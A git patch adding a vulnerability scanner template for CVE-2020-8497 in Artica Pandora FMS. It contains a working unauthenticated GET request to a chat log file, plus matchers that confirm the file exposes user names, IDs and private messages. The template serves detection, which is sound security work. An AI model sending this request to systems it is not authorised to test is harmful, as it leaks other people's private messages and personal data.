From b76c1d20f3c5cbd54eeb78335885d4ce4127bb64 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 6 Dec 2021 08:36:14 +0900 Subject: [PATCH] Create CVE-2020-8497.yaml In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-8497.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2020/CVE-2020-8497.yaml diff --git a/cves/2020/CVE-2020-8497.yaml b/cves/2020/CVE-2020-8497.yaml new file mode 100644 index 0000000000..6a892b8036 --- /dev/null +++ b/cves/2020/CVE-2020-8497.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-8497 + +info: + name: Artica Pandora FMS - Arbitrary File Read + author: gy741 + severity: medium + description: In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. + reference: https://k4m1ll0.com/cve-2020-8497.html + tags: cve,cve2020,fms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.30 + cve-id: CVE-2020-8497 + cwe-id: CWE-306 + +requests: + - method: GET + path: + - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt' + + matchers-condition: and + matchers: + - type: word + words: + - "type" + - "id_user" + - "user_name" + - "text" + part: body + condition: and + + - type: status + status: + - 200